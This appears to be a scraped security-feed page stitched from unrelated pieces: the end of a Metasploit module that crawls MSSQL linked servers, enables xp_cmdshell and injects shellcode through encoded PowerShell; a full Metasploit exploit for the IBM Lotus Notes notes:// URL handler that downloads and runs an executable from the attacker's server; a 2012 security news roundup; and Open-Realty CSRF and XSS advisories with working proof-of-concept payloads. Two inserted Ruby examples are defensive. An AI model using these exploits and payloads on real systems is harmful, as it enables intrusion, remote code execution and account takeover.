        print_status("-------------------------------------------------")
        execute = "select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server'"
        sql = query_builder(server["path"].first,"",0,execute)
        result = mssql_query(sql, false) if mssql_login_datastore

        result[:rows].each {|name|
          name.each {|name|

            # Check if link works and if sysadmin permissions - temp array to save orig server[path]
            temppath = Array.new
            temppath = server["path"].first.dup
            temppath << name

            # Get configuration information from the linked server
            sql = query_builder(temppath,"",0,versionQuery)
            result = mssql_query(sql, false) if mssql_login_datastore

            # Add newly acquired db servers to the masterlist, but don't add them if the link is broken or already exists
            if result[:errors].empty? and result[:rows] != nil then
              # Assign db query results to variables for hash
              parse_results = result[:rows]

              # Add link server information to loot
              link_status = 'up'
              write_to_report(name,server,parse_results,linked_server_table,link_status)

              # Display link server information in verbose mode
              if datastore['VERBOSE'] == true
                show_configs(name,parse_results)
                print_status("  o Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
              else
                if parse_results[0][5] == 1
                  print_good("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} (Sysadmin!)")
                else
                  print_status("Link path: #{masterList.first["name"]} -> #{temppath.join(" -> ")}")
                end
              end

              # Add link to masterlist hash
              unless masterList.any? {|f| f["name"] == name}
                masterList << add_host(name,server["path"].first,parse_results)
              else
                (0..masterList.length-1).each do |x|
                  if masterList[x]["name"] == name
                    masterList[x]["path"] << server["path"].first.dup
                    masterList[x]["path"].last << name
                    unless shelled.include?(name)
                      if parse_results[0][2]==1
                        enable_xp_cmdshell(masterList[x]["path"].last.dup,name,shelled)
                      end
                    end
                  else
                    break
                  end
                end
              end
            else
              # Add to report
              linked_server_table << [server["name"],server["db_version"],server["db_os"],name,'NA','NA','NA','NA','Connection Failed']

              # Display status to user
              if datastore['VERBOSE'] == true
                print_status(" ")
                print_error("Linked Server: #{name} ")
                print_error("  o Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
                print_status("    Failure could be due to:")
                print_status("    - A dead server")
                print_status("    - Bad credentials")
                print_status("    - Nested open queries through SQL 2000")
              else
                print_error("Link Path: #{masterList.first["name"]} -> #{temppath.join(" -> ")} - Connection Failed")
              end
            end
          }
        }
      end
      # Set server to "crawled"
      server["done"]=1
    end

    print_status("-------------------------------------------------")

    # Setup table for loot
    this_service = nil
    if framework.db and framework.db.active
      this_service = report_service(
        :host  => rhost,
        :port => rport,
        :name => 'mssql',
        :proto => 'tcp'
      )
    end

    # Display end time
    time1 = Time.new
    print_status("End time : #{time1.inspect}")
    print_status("-------------------------------------------------")

    # Write log to loot / file
    if (save_loot=="yes")
      filename= "#{datastore['RHOST']}-#{datastore['RPORT']}_linked_servers.csv"
      path = store_loot("crawled_links", "text/plain", datastore['RHOST'], linked_server_table.to_csv, filename, "Linked servers",this_service)
      print_status("Results have been saved to: #{path}")
    end
  end

  # ---------------------------------------------------------------------
  # Method that builds nested openquery statements used during crawling
  # ---------------------------------------------------------------------
  def query_builder(path,sql,ticks,execute)

    # Temp used to maintain the original masterList[x]["path"]
    temp = Array.new
    path.each {|i| temp << i}

    # Actual query - defined when the function originally called - ticks multiplied
    if path.length == 0
      return execute.gsub("'","'"*2**ticks)

    # openquery generator
    else
      sql = "select * from openquery(\"" + temp.shift + "\"," + "'"*2**ticks + query_builder(temp,sql,ticks+1,execute) + "'"*2**ticks + ")"
      return sql
    end
  end

  # ---------------------------------------------------------------------
  # Method that builds nested "exec(...) at [server]" (RPC out) statements used during crawling
  # ---------------------------------------------------------------------
  def query_builder_rpc(path,sql,ticks,execute)

    # Temp used to maintain the original masterList[x]["path"]
    temp = Array.new
    path.each {|i| temp << i}

    # Actual query - defined when the function originally called - ticks multiplied
    if path.length == 0
      return execute.gsub("'","'"*2**ticks)

    # Openquery generator
    else
      exec_at = temp.shift
      sql = "exec(" + "'"*2**ticks + query_builder_rpc(temp,sql,ticks+1,execute) + "'"*2**ticks +") at [" + exec_at + "]"
      return sql
    end
  end

  # ---------------------------------------------------------------------
  # Method for adding new linked database servers to the crawl list
  # ---------------------------------------------------------------------
  def add_host(name,path,parse_results)

    # Used to add new servers to masterList
    server = Hash.new
    server["name"] = name
    temppath = Array.new
    path.each {|i| temppath << i }
    server["path"] = [temppath]
    server["path"].first << name
    server["done"] = 0
    parse_results.each {|stuff|
      server["db_user"] = stuff.at(1)
      server["db_sysadmin"] = stuff.at(2)
      server["db_version"] =  stuff.at(3)
      server["db_os"] = stuff.at(4)
      server["numlinks"] = stuff.at(6)
    }
    return server
  end

  # ---------------------------------------------------------------------
  # Method to display configuration information
  # ---------------------------------------------------------------------
  def show_configs(i,parse_results,entry=false)

    print_status(" ")
    parse_results.each {|stuff|

      # Translate sysadmin code
      status = stuff.at(5)
      if status == 1 then
        dbpriv = "sysadmin"
      else
        dbpriv = "user"
      end

      # Display database link information
      if entry == false
        print_status("Linked Server: #{i}")
        print_status("  o Link user: #{stuff.at(1)}")
        print_status("  o Link privs: #{dbpriv}")
        print_status("  o Link version: #{stuff.at(3)}")
        print_status("  o Link OS: #{stuff.at(4).strip}")
        print_status("  o Links on server: #{stuff.at(6)}")
      else
        print_status("Server: #{i}")
        print_status("  o Server user: #{stuff.at(1)}")
        print_status("  o Server privs: #{dbpriv}")
        print_status("  o Server version: #{stuff.at(3)}")
        print_status("  o Server OS: #{stuff.at(4).strip}")
        print_status("  o Links on server: #{stuff.at(6)}")
      end
    }
  end

  # ---------------------------------------------------------------------
  # Method for generating the report and loot
  # ---------------------------------------------------------------------
  def write_to_report(i,server,parse_results,linked_server_table,link_status)
    parse_results.each {|stuff|
      # Parse server information
      db_link_user = stuff.at(1)
      db_link_sysadmin = stuff.at(2)
      db_link_version =  stuff.at(3)
      db_link_os = stuff.at(4)

      # Add link server to the reporting array and set link_status to 'up'
      linked_server_table << [server["name"],server["db_version"],server["db_os"],i,db_link_user,db_link_sysadmin,db_link_version,db_link_os,link_status]

      return linked_server_table
    }
  end

  # ---------------------------------------------------------------------
  # Method for enabling xp_cmdshell
  # ---------------------------------------------------------------------
  def enable_xp_cmdshell(path,name,shelled)
    # Enables "show advanced options" and xp_cmdshell if needed and possible
    # They cannot be enabled in user transactions (i.e. via openquery)
    # Only enabled if RPC_Out is enabled for linked server
    # All changes are reverted after payload delivery and execution

    # Check if "show advanced options" is enabled
    execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'show advanced options'"
    sql = query_builder(path,"",0,execute)
    result = mssql_query(sql, false) if mssql_login_datastore
    saoOrig = result[:rows].pop.pop

    # Check if "xp_cmdshell" is enabled
    execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
    sql = query_builder(path,"",0,execute)
    result = mssql_query(sql, false) if mssql_login_datastore
    xpcmdOrig = result[:rows].pop.pop

    # Try blindly to enable "xp_cmdshell" on the linked server
    # Note:
    # This only works if rpcout is enabled for all links in the link path.
    # If that is not the case it fails cleanly.
    if xpcmdOrig == 0
      if saoOrig == 0
        # Enabling show advanced options and xp_cmdshell
        execute = "sp_configure 'show advanced options',1;reconfigure"
        sql = query_builder_rpc(path,"",0,execute)
        result = mssql_query(sql, false) if mssql_login_datastore
      end

      # Enabling xp_cmdshell
      print_status("\t - xp_cmdshell is not enabled on " + name + "... Trying to enable")
      execute = "sp_configure 'xp_cmdshell',1;reconfigure"
      sql = query_builder_rpc(path,"",0,execute)
      result = mssql_query(sql, false) if mssql_login_datastore
    end

    # Verifying that xp_cmdshell is now enabled (could be unsuccessful due to server policies, total removal etc.)
    execute = "select cast(value_in_use as int) FROM  sys.configurations WHERE  name = 'xp_cmdshell'"
    sql = query_builder(path,"",0,execute)
    result = mssql_query(sql, false) if mssql_login_datastore
    xpcmdNow = result[:rows].pop.pop

    if xpcmdNow == 1 or xpcmdOrig == 1
      print_status("\t - Enabled xp_cmdshell on " + name) if xpcmdOrig == 0
      if datastore['DEPLOY']
        print_status("Ready to deploy a payload #{name}")
        if datastore['DEPLOYLIST']==""
          datastore['DEPLOYLIST'] = nil
        end
        if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
          print_status("\t - Checking if #{name} is on the deploy list...")
        end
        if datastore['DEPLOYLIST'] != nil
          deploylist = datastore['DEPLOYLIST'].upcase.split(',')
        end
        if datastore['DEPLOYLIST'] == nil or deploylist.include? name.upcase
          if datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
            print_status("\t - #{name} is on the deploy list.")
          end
          unless shelled.include?(name)
            powershell_upload_exec(path)
            shelled << name
          else
            print_status("Payload already deployed on #{name}")
          end
        elsif datastore['DEPLOYLIST'] != nil and datastore["VERBOSE"] == true
          print_status("\t - #{name} is not on the deploy list")
        end
      end
    else
      print_error("\t - Unable to enable xp_cmdshell on " + name)
    end

    # Revert soa and xp_cmdshell to original state
    if xpcmdOrig == 0 and xpcmdNow == 1
      print_status("\t - Disabling xp_cmdshell on " + name)
      execute = "sp_configure 'xp_cmdshell',0;reconfigure"
      sql = query_builder_rpc(path,"",0,execute)
      result = mssql_query(sql, false) if mssql_login_datastore
    end
    if saoOrig == 0 and xpcmdNow == 1
      execute = "sp_configure 'show advanced options',0;reconfigure"
      sql = query_builder_rpc(path,"",0,execute)
      result = mssql_query(sql, false) if mssql_login_datastore
    end
  end

  # ----------------------------------------------------------------------
  # Method that delivers shellcode payload via powershell thread injection
  # ----------------------------------------------------------------------
  def powershell_upload_exec(path)

    # Create powershell script that will inject shell code from the selected payload
    myscript ="$code = @\"
[DllImport(\"kernel32.dll\")]
public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
[DllImport(\"kernel32.dll\")]
public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
[DllImport(\"msvcrt.dll\")]
public static extern IntPtr memset(IntPtr dest, uint src, uint count);
\"@
$winFunc = Add-Type -memberDefinition $code -Name \"Win32\" -namespace Win32Functions -passthru
[Byte[]]$sc =#{Rex::Text.to_hex(payload.encoded).gsub('\\',',0').sub(',','')}
$size = 0x1000
if ($sc.Length -gt 0x1000) {$size = $sc.Length}
$x=$winFunc::VirtualAlloc(0,0x1000,$size,0x40)
for ($i=0;$i -le ($sc.Length-1);$i++) {$winFunc::memset([IntPtr]($x.ToInt32()+$i), $sc[$i], 1)}
$winFunc::CreateThread(0,0,$x,0,0,0)"

    # Unicode encode powershell script
    mytext_uni = Rex::Text.to_unicode(myscript)

    # Base64 encode unicode
    mytext_64 = Rex::Text.encode_base64(mytext_uni)

    # Generate random file names
    rand_filename = rand_text_alpha(8)
    var_duplicates = rand_text_alpha(8)

    # Write base64 encoded powershell payload to temp file
    # This is written 2500 characters at a time due to xp_cmdshell ruby function limitations
    # Also, line number tracking was added so that duplicate lines caused by nested linked
    # queries could be found and removed.
    print_status("Deploying payload...")
    linenum = 0
    mytext_64.scan(/.{1,2500}/).each {|part|
      execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Write \"--#{linenum}--#{part}\" >> %TEMP%\\#{rand_filename}\"'"
      sql = query_builder(path,"",0,execute)
      result = mssql_query(sql, false) if mssql_login_datastore
      linenum = linenum+1
    }

    # Remove duplicate lines from temp file and write to new file
    execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{rand_filename}| get-unique > %TEMP%\\#{var_duplicates}\"'"
    sql = query_builder(path,"",0,execute)
    result = mssql_query(sql, false) if mssql_login_datastore

    # Remove tracking tags from lines
    execute = "select 1;exec master..xp_cmdshell 'powershell -C \"gc %TEMP%\\#{var_duplicates} | Foreach-Object {$_ -replace \\\"--.*--\\\",\\\"\\\"} | Set-Content %TEMP%\\#{rand_filename}\"'"
    sql = query_builder(path,"",0,execute)
    result = mssql_query(sql, false) if mssql_login_datastore

    # Used base64 encoded powershell command so that we could use -noexit and avoid parsing errors
    # If running on 64bit system, 32bit powershell called from syswow64
    powershell_cmd =  "$temppath=(gci env:temp).value;$dacode=(gc $temppath\\#{rand_filename}) -join '';if((gci env:processor_identifier).value -like\
    '*64*'){$psbits=\"#{datastore['POWERSHELL_PATH']} -noexit -noprofile -encodedCommand $dacode\"} else {$psbits=\"powershell.exe\
    -noexit -noprofile -encodedCommand $dacode\"};iex $psbits"
    powershell_uni = Rex::Text.to_unicode(powershell_cmd)
    powershell_64 = Rex::Text.encode_base64(powershell_uni)

    # Setup query
    execute = "select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand #{powershell_64}'"
    sql = query_builder(path,"",0,execute)

    # Execute the payload
    print_status("Executing payload...")
    result = mssql_query(sql, false) if mssql_login_datastore
    # Remove payload data from the target server
    execute = "select 1; EXEC master..xp_cmdshell 'powershell -C \"Remove-Item %TEMP%\\#{rand_filename}\";powershell -C \"Remove-Item %TEMP%\\#{var_duplicates}\"'"
    sql = query_builder(path,"",0,execute)
    result = mssql_query(sql,false)
  end
end
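A defender-side counterpart to the crawler above, added here as an example and not part of the Metasploit module: it scans SQL Server statement-audit text for the link-enumeration query, multi-hop OPENQUERY nesting, sp_configure pushed through "exec(...) at [server]", and xp_cmdshell launching an encoded PowerShell command. The audit lines, their simplified "timestamp login statement" layout, and the login and server names are constructed assumptions.

```ruby
# Added example, not part of the Metasploit module: offline triage of SQL Server
# statement-audit text for the patterns the link crawler leaves behind. Real
# exports (SQL Server Audit, Extended Events, Profiler) carry more columns, so
# adjust parse_audit_line for your format.

# Constructed audit lines: "<timestamp> <login> <statement>".
SAMPLE_AUDIT = <<~LOG
  2012-12-27T10:01:02 sa   select srvname from master..sysservers where dataaccess=1 and srvname!=@@servername and srvproduct = 'SQL Server'
  2012-12-27T10:01:05 sa   select * from openquery("SQL02",'select * from openquery("SQL03",''select @@version'')')
  2012-12-27T10:01:09 sa   exec('sp_configure ''xp_cmdshell'',1;reconfigure') at [SQL02]
  2012-12-27T10:01:12 sa   select 1; EXEC master..xp_cmdshell 'powershell -EncodedCommand JABjAG8AZABlAA=='
  2012-12-27T10:02:00 app  select top 10 name from sys.tables
LOG

# Signatures drawn from the crawler's own queries. Matching is case-insensitive
# and deliberately loose: this is triage, not a T-SQL parser, so comments and
# whitespace tricks can evade it.
RULES = {
  # Enumerating linked servers that allow data access (the crawl's seed query).
  link_enumeration:    /\bsysservers\b.*\bdataaccess\s*=\s*1/i,
  # sp_configure pushed through a linked server via EXEC ... AT (needs RPC Out).
  rpc_out_reconfigure: /\bexec\s*\(.*sp_configure.*\)\s*at\s*\[/im,
  # xp_cmdshell launching an encoded PowerShell command line.
  encoded_powershell:  /xp_cmdshell.*\bpowershell\b.*\s-e(c|nc|ncodedcommand)?\b/i
}.freeze

# Number of OPENQUERY calls in one statement; the crawler nests one per hop,
# so depth >= 2 means a multi-hop link path, which few applications issue.
def openquery_depth(stmt)
  stmt.scan(/\bopenquery\s*\(/i).size
end

# Link path implied by nested OPENQUERY calls, outermost hop first.
def link_path(stmt)
  stmt.scan(/\bopenquery\s*\(\s*"?([^",\s]+)"?/i).flatten
end

# Tags that apply to one statement (empty for benign statements).
def classify_statement(stmt)
  tags = RULES.select { |_, re| re.match?(stmt) }.keys
  tags << :nested_openquery if openquery_depth(stmt) >= 2
  tags
end

# Parse one constructed audit line into its three fields; nil if malformed.
def parse_audit_line(line)
  ts, login, stmt = line.strip.split(/\s+/, 3)
  return nil if stmt.nil? || stmt.empty?
  { time: ts, login: login, statement: stmt }
end

# Returns only the audit entries that matched at least one signature.
def scan_audit(text)
  text.each_line.map do |line|
    entry = parse_audit_line(line)
    next nil if entry.nil?
    tags = classify_statement(entry[:statement])
    next nil if tags.empty?
    entry.merge(tags: tags,
                depth: openquery_depth(entry[:statement]),
                path: link_path(entry[:statement]))
  end.compact
end

if __FILE__ == $0
  scan_audit(SAMPLE_AUDIT).each do |hit|
    path = hit[:path].empty? ? "" : " path=#{hit[:path].join(' -> ')}"
    puts "#{hit[:time]} #{hit[:login]} #{hit[:tags].join(',')}#{path}"
  end
end
```

Single-hop OPENQUERY and sp_configure run locally are deliberately not flagged, since both are common in legitimate administration; the multi-hop chain and the RPC-forwarded reconfigure are what distinguish a crawl.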





//The information contained within this publication is
//supplied "as-is" with no warranties or guarantees of fitness
//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

Metasploit: IBM Lotus Notes Client URL Handler Command Injection


##
#Credit: Moritz Jodeit, Sean de Regge, juan vazquez
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info={})
    super(update_info(info,
      'Name'           => "IBM Lotus Notes Client URL Handler Command Injection",
      'Description'    => %q{
          This module exploits a command injection vulnerability in the URL handler
        for the IBM Lotus Notes Client <= 8.5.3. The registered handler can be abused with
        a specially crafted notes:// URL to execute arbitrary commands with arbitrary
        arguments. This module has been tested successfully on Windows XP SP3 with IE8,
        Google Chrome 23.0.1271.97 m and IBM Lotus Notes Client 8.5.2.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Moritz Jodeit', # Vulnerability discovery
          'Sean de Regge', # Vulnerability analysis
          'juan vazquez' # Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2012-2174' ],
          [ 'OSVDB', '83063' ],
          [ 'BID', '54070' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-154/' ],
          [ 'URL', 'http://pwnanisec.blogspot.com/2012/10/exploiting-command-injection.html' ],
          [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21598348' ]
        ],
      'Payload'        =>
        {
          'Space'           => 2048,
          'StackAdjustment' => -3500
        },
      'DefaultOptions'  =>
        {
          'EXITFUNC'         => "none",
          'InitialAutoRunScript' => 'migrate -k -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ]
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 18 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def exploit
    @exe_name = rand_text_alpha(2) + ".exe"
    @stage_name = rand_text_alpha(2) + ".js"
    super
  end

  def on_new_session(session)
    if session.type == "meterpreter"
      session.core.use("stdapi") unless session.ext.aliases.include?("stdapi")
    end

    @dropped_files.delete_if do |file|
      win_file = file.gsub("/", "\\\\")
      if session.type == "meterpreter"
        begin
          wintemp = session.fs.file.expand_path("%TEMP%")
          win_file = "#{wintemp}\\#{win_file}"
          # Meterpreter should do this automatically as part of
          # fs.file.rm().  Until that has been implemented, remove the
          # read-only flag with a command.
          session.shell_command_token(%Q|attrib.exe -r "#{win_file}"|)
          session.fs.file.rm(win_file)
          print_good("Deleted #{file}")
          true
        rescue ::Rex::Post::Meterpreter::RequestError
          print_error("Failed to delete #{win_file}")
          false
        end

      end
    end

  end

  def on_request_uri(cli, request)

    if request.uri =~ /\.exe$/
      return if ((p=regenerate_payload(cli))==nil)
      register_file_for_cleanup("#{@stage_name}") unless @dropped_files and @dropped_files.include?("#{@stage_name}")
      register_file_for_cleanup("#{@exe_name}") unless @dropped_files and @dropped_files.include?("#{@exe_name}")
      data = generate_payload_exe({:code=>p.encoded})
      print_status("Sending payload")
      send_response(cli, data, {'Content-Type'=>'application/octet-stream'})
      return
    end

    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    if datastore['SSL']
      schema = "https"
    else
      schema = "http"
    end
    uri = "#{schema}://#{my_host}"
    uri << ":#{datastore['SRVPORT']}#{get_resource()}/#{rand_text_alpha(rand(6)+3)}.exe"

    script = "var w=new ActiveXObject('wscript.shell');"
    script << "w.CurrentDirectory=w.ExpandEnvironmentStrings('\\%TEMP\\%');"
    script << "var x=new ActiveXObject('Microsoft.XMLHTTP');"
    script << "x.open('GET','#{uri}', false);"
    script << "x.send();"
    script << "var s=new ActiveXObject('ADODB.Stream');"
    script << "s.Mode=3;"
    script << "s.Type=1;"
    script << "s.Open();"
    script << "s.Write(x.responseBody);"
    script << "s.SaveToFile('#{@exe_name}',2);"
    script << "w.Run('#{@exe_name}');"

    vmargs = "/q /s /c echo #{script} > %TEMP%\\\\#{@stage_name}& start cscript %TEMP%\\\\#{@stage_name}& REM"

    link_id = rand_text_alpha(5 + rand(5))

    js_click_link = %Q|
    function clickLink(link) {
      var cancelled = false;

      if (document.createEvent) {
        var event = document.createEvent("MouseEvents");
        event.initMouseEvent("click", true, true, window,
          0, 0, 0, 0, 0,
          false, false, false, false,
          0, null);
        cancelled = !link.dispatchEvent(event);
      }
      else if (link.fireEvent) {
        cancelled = !link.fireEvent("onclick");
      }

      if (!cancelled) {
        window.location = link.href;
      }
    }
    |

    if datastore['OBFUSCATE']
      js_click_link = ::Rex::Exploitation::JSObfu.new(js_click_link)
      js_click_link.obfuscate
      js_click_link_fn = js_click_link.sym('clickLink')
    else
      js_click_link_fn = 'clickLink'
    end


    html = <<-EOS
    <html>
    <head>
    <script>
    #{js_click_link}
    </script>
    </head>
    <body onload="#{js_click_link_fn}(document.getElementById('#{link_id}'));">
    <a id="#{link_id}" href="notes://#{rand_text_alpha_upper(3+rand(3))}/#{rand_text_alpha_lower(3+rand(3))} -RPARAMS java -vm c:\\windows\\system32\\cmd.exe -vmargs #{vmargs}"></a>
    </body>
    </html>
    EOS

    print_status("Sending html")
    send_response(cli, html, {'Content-Type'=>'text/html'})

  end

end





Top 10 IT security stories of 2012


Enterprise IT security professionals faced increasingly sophisticated, stealthy and dynamic threats in 2012, but numerous surveys revealed that knowledge and understanding of the latest attack techniques are lacking in many organisations. Similarly, user security awareness has been a recurrent theme.

The past year saw an increase in the cost of data breaches, as well as a growing number of attacks targeting new technologies such as virtualisation, new communication channels such as social networking and new mobile devices.


Continued budget constraints have also prompted a growing number of calls for greater alignment between IT security and the business.

Here are 10 articles that illustrate some of the key challenges and strategies around information security for governments, businesses and individuals.

IT security workers must support business needs, says Ernst & Young
IT security professionals need to transform the profession if they are to persuade business they are doing a good job, according to Mark Brown, director of information security at Ernst & Young. “Most organisations think information security professionals are not fulfilling the needs of business,” Brown told attendees of the Govnet Cyber Security Summit 2012 in London.

Evasion threat to critical systems goes ignored, says Stonesoft
Many organisations continue to rely on ineffective intrusion prevention systems (IPS) for defending information systems, says security firm Stonesoft. Advanced evasion techniques (AETs) – which combine several known evasion methodologies to create new and dynamically changing techniques – bypass most IPSs on the market, tests have shown.

UK organisations fail to address social networking risk
Unguarded corporate social media accounts are leaving companies exposed to serious security breaches, a survey of more than 1,000 senior UK executives revealed. Most respondents (87%) said they use social media strategies to enhance their business, but 45% said they had experienced a security scare as a direct result in the past year, according to the survey by OnePoll on behalf of KPMG.


Read more: http://www.computerweekly.com/news/2240174302/Top-10-IT-security-stories-of-2012?goback=%2Egmp_38412%2Egde_38412_member_198929766

Open-Realty CMS 3.x Cross Site Request Forgery (CSRF) Vulnerability


1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Cross Site Request Forgery.


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Open-Realty 3.x versions contain a flaw that allows a remote
Cross-site Request Forgery (CSRF / XSRF) attack. The flaw exists
because the application does not require multiple steps or explicit
confirmation for sensitive transactions in the majority of administrator
functions, such as adding a new user or granting a user administrative
privileges. By using a crafted URL, an attacker may trick the victim
into visiting his web page to take advantage of the trust
relationship between the authenticated victim and the application.
Such an attack could trick the victim into executing arbitrary
commands in the context of their session with the application, without
further prompting or verification.


4. VERSIONS AFFECTED

3.x


5. PROOF-OF-CONCEPT/EXPLOIT

<!-- Change Password -->
<form action="http://127.0.0.1/admin/ajax.php?action=ajax_update_user_data"
method="POST">
  <input type="hidden" name="user&#95;id" value="2" />
  <input type="hidden" name="user&#95;first&#95;name" value="Well" />
  <input type="hidden" name="user&#95;last&#95;name" value="Smith" />
  <input type="hidden" name="user&#95;email" value="hacker&#64;yehg.net" />
  <input type="hidden" name="phone" value="123456789" />
  <input type="hidden" name="mobile" value="9151403793" />
  <input type="hidden" name="fax" value="" />
  <input type="hidden" name="homepage" value="http&#58;&#47;&#47;yehg.net" />
  <input type="hidden" name="info" value="test" />
  <input type="hidden" name="edit&#95;user&#95;pass" value="agent" />
  <input type="hidden" name="edit&#95;user&#95;pass2" value="agent" />
  <input type="submit" value="Submit form" />
</form>
<script>
  document.forms[0].submit();
</script>


6. SOLUTION

The vendor has not responded to the report since 2012-11-17.
It is recommended that an alternate software package be used in its place.
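The server-side check the advisory describes as missing, written as an added Ruby example (not Open-Realty's code and not part of the advisory): a handler for an admin action shaped like ajax_update_user_data that requires a per-session synchronizer token and rejects cross-site posts by their Origin or Referer. The trusted origin, the hash-based session and the parameter set (taken from the proof of concept above) are assumptions.

```ruby
# Added example, not part of the advisory or of Open-Realty: the CSRF check
# the advisory says the admin functions lack. Session, headers and parameters
# are plain hashes constructed here; a real application gets them from its
# framework. Both checks fail closed when the relevant input is missing.
require 'securerandom'
require 'uri'

TRUSTED_ORIGIN = "http://127.0.0.1".freeze  # assumption: where the admin UI is served

# Hand the browser a per-session token to embed in legitimate admin forms.
def issue_csrf_token(session)
  session[:csrf_token] ||= SecureRandom.hex(32)
end

# Constant-time comparison so a wrong token cannot be guessed byte by byte.
def secure_equal?(a, b)
  return false if a.nil? || b.nil? || a.bytesize != b.bytesize
  a.bytes.zip(b.bytes).inject(0) { |acc, (x, y)| acc | (x ^ y) }.zero?
end

def valid_csrf_token?(session, submitted)
  secure_equal?(session[:csrf_token], submitted)
end

# A cross-site form post carries the attacker's Origin (or Referer), never ours.
# Scheme, host and port must all match; a prefix check would accept look-alikes.
def same_origin?(header_value, trusted = TRUSTED_ORIGIN)
  return false if header_value.nil? || header_value.empty?
  got, want = URI.parse(header_value), URI.parse(trusted)
  got.scheme == want.scheme && got.host == want.host && got.port == want.port
rescue URI::InvalidURIError
  false
end

# Returns [status, message]; the user record would only be changed on 200.
def update_user_data(session, headers, params)
  origin = headers["Origin"] || headers["Referer"]
  return [403, "cross-site request rejected"] unless same_origin?(origin)
  return [403, "missing or invalid CSRF token"] unless valid_csrf_token?(session, params["csrf_token"])
  return [400, "user_id required"] if params["user_id"].to_s.empty?
  # ... apply the change here ...
  [200, "user #{params['user_id']} updated"]
end

# Parameters from the proof of concept, as the browser would submit them.
FORGED_PARAMS = {
  "user_id" => "2", "user_first_name" => "Well", "user_last_name" => "Smith",
  "edit_user_pass" => "agent", "edit_user_pass2" => "agent"
}.freeze

if __FILE__ == $0
  session = {}
  token = issue_csrf_token(session)
  p update_user_data(session, { "Origin" => "http://attacker.example" }, FORGED_PARAMS)
  p update_user_data(session, { "Origin" => TRUSTED_ORIGIN }, FORGED_PARAMS)
  p update_user_data(session, { "Origin" => TRUSTED_ORIGIN }, FORGED_PARAMS.merge("csrf_token" => token))
end
```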


7. VENDOR

Transparent Technologies Inc.
http://www.transparent-support.com


8. CREDIT

Aung Khant, http://yehg.net, YGN Ethical Hacker Group, Myanmar.


9. DISCLOSURE TIME-LINE

2012-11-17: Vulnerability Reported
2012-12-25: Vulnerability Disclosed


10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/%5Bopen-realty_3.x%5D_csrf
Open-Realty Home Page: http://www.open-realty.org/


#yehg [2012-12-25]

---------------------------------
Best regards,
YGN Ethical Hacker Group
Yangon, Myanmar
http://yehg.net
Our Lab | http://yehg.net/lab
Our Directory | http://yehg.net/hwd







Open-Realty CMS 3.x Persistent Cross Site Scripting (XSS) Vulnerability


1. OVERVIEW

Open-Realty CMS 3.x versions are vulnerable to Persistent Cross Site
Scripting (XSS).


2. BACKGROUND

Open-Realty is the world's leading real estate listing marketing and
management CMS application, and has enjoyed being the real estate web
site software of choice for professional web site developers since
2002.


3. VULNERABILITY DESCRIPTION

Multiple parameters are not properly sanitized, which allows an attacker
to conduct a Cross Site Scripting attack. This may allow an attacker to
create a specially crafted URL that would execute arbitrary script
code in a victim's browser.


4. VERSIONS AFFECTED

3.x


5. PROOF-OF-CONCEPT/EXPLOIT

/admin/ajax.php (parameter: title, full_desc, ta)

///////////////////////////////////////////////////////

POST /admin/ajax.php?action=ajax_update_listing_data HTTP/1.1
Host: localhost
Content-Length: 574
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=854a264c2f7766cea2edbfce6ffb02e7;

edit=7305&title=test'%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&full_desc='%22%3E%3Cscript%3Ealert('XSS')%3C%2Fscript%3E&seotitle=test-7002&edit_active=yes&mlsexport=no&or_owner=2&notes=66&address=aaa&city=aaa&state=AK&zip=222&country=&neighborhood=&price=&beds=&baths=&floors=&year_built=&garage_size=&sq_feet=&lot_size=&prop_tax=&status=Active&mls=&home_features%5B%5D=&community_features%5B%5D=&openhousedate=

///////////////////////////////////////////////////////
POST /admin/ajax.php?action=ajax_update_blog_post HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 112
Origin: http://localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
